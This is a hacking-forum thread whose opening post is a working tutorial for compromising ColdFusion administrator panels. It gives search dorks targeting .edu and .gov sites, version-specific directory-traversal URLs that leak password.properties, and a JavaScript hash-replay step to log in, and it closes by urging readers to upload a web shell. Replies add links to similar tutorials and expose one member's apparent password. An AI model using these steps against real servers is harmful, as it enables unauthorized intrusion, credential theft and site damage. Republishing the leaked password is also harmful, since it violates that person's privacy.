Login Register






The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thread Rating:
  • 0 Vote(s) - 0 Average


Tutorial How to hack cold fusion filter_list
Author
Message
How to hack cold fusion #1
What is ColdFusion
Quote:ColdFusion is a commercial rapid web application development platform invented by Jeremy and JJ Allaire in 1995. (The programming language used with that platform is also commonly called ColdFusion, though is more accurately known as CFML.) ColdFusion was originally designed to make it easier to connect simple HTML pages to a database. By Version 2 (1996), it had become a full platform that included an IDE in addition to a "full" scripting language. As of 2010, versions of ColdFusion (purchased by Adobe Systems in 2005) include advanced features for enterprise integration and development of rich Internet applications.
More can be read here.

What you will need.

This method is basically an LFI/RFI attack.

The tutorial

First we will want to find a vulnerable site, use these dorks.
Code:
inurl:cfm
inurl:cfm inurl:edu
inurl:cfm inurl:gov

Once you have found a vulnerable site, see if you can access the admin panel.
Code:
http://youwontfindanythinghereshithead.com/CFIDE/administrator/enter.cfm
If you get a error or the version is above 9 find another site.

If the site is version 6 it will be like this.
Code:
http://youwontfindanythinghereshithead.com/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en

If the site is version 7 it will be like this.
Code:
http://youwontfindanythinghereshithead.com/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en

If the site is version 8 it will be like this.
Code:
http://youwontfindanythinghereshithead.com/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en

Now there should be a hash on the webpage, that is the password.
You only have a 30 second window to complete this step.

Run this script in the address bar.
Code:
javascript:alert(hex_hmac_sha1(document.loginform.salt.value,document.loginform.cfadminPassword.value))

An alert should pop up with the hash, copy it.
Now go to tamper data, and start tampering.
Choose the login form, and paste the hash into the password field.
Click OK.
Now you should be in the admin panel of the website, upload the shell I have provided and then you're free to wreck shit, like we do here at Sinister.ly


I hope you find this tutorial useful.

Reply

RE: Hack Cold Fusion #2
Neat share. I will defiantly try this out later.
[Image: 8536321abf.jpg]Me and Lux are the realest users here.
[STAFF DETERMINED SIGNATURE AS LEWD]
JDM>USDM

Reply

RE: Hack Cold Fusion #3
So you basically just made a shittier version of the tutorial on BH? Why not just post the link?
http://www.blackhatlibrary.net/Cold_Fusion_Hacking

Ryan also wrote a tutorial.
http://www.hackforums.net/showthread.php?tid=3037513

9 and 10 are also publicly vulnerable, btw.

EDIT: lol at the censor

Reply

RE: Hack Cold Fusion #4
(06-15-2013, 02:12 AM)Dyme Wrote: So you basically just made a shittier version of the tutorial on BH? Why not just post the link?
http://www.blackhatlibrary.net/Cold_Fusion_Hacking

Ryan also wrote a tutorial.
http://www.[Competing Site].net/showthread.php?tid=3037513

9 and 10 are also publicly vulnerable, btw.

EDIT: lol at the censor

That would be the case. 100 percent.

Edit.
I love your password.
ilovekonata

Reply

RE: Hack Cold Fusion #5
(06-15-2013, 02:15 AM)Kirito Wrote: That would be the case. 100 percent.

Lol I know Charon gave you that list. He was kicked from antag for a reason. Dont worry "Charon", I'll eventually get around to releasing logs of all the skid shit you asked me someday or an other.

Also, I love how you talk shit about htp, and then use a shell they coded for your tutorial. Definition of a hypocrite.

(06-15-2013, 02:15 AM)Kirito Wrote: That would be the case. 100 percent.

Edit.
I love your password.
ilovekonata

Gave Charon the pass as well. You're not impressive.

Reply

RE: Hack Cold Fusion #6
(06-15-2013, 02:23 AM)Dyme Wrote: Lol I know Charon gave you that list. He was kicked from antag for a reason. Dont worry "Charon", I'll eventually get around to releasing logs of all the skid shit you asked me someday or an other.

Also, I love how you talk shit about htp, and then use a shell they coded for your tutorial. Definition of a hypocrite.


Gave Charon the pass as well. You're not impressive.

lolno.
You are so far out of the loop, it makes me giggle like a school girl.

Reply

RE: Hack Cold Fusion #7
Banshee already created this tutorial beforehand.
[Image: F4Z9Dqw.png]

Reply

RE: Hack Cold Fusion #8
(06-15-2013, 07:37 PM)BreShiE Wrote: Banshee already created this tutorial beforehand.

Was it Banshee, or was it Kirito?
[Image: BAvhP6h.png]
Code:
[5:42:25 PM] i0xillusi0n: Breshie don't bust a nut over chloe now
[5:42:31 PM] Entity: fapfapfapfapfapfapfapfapfapfap
[5:42:33 PM] Jigglypuff | SL: EWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW

Reply

RE: Hack Cold Fusion #9
(06-15-2013, 07:37 PM)BreShiE Wrote: Banshee already created this tutorial beforehand.

Why does that matter?
He posted one, I posted one.

Reply

RE: Hack Cold Fusion #10
Nice share, keep it up yooh.

Reply







Users browsing this thread: 1 Guest(s)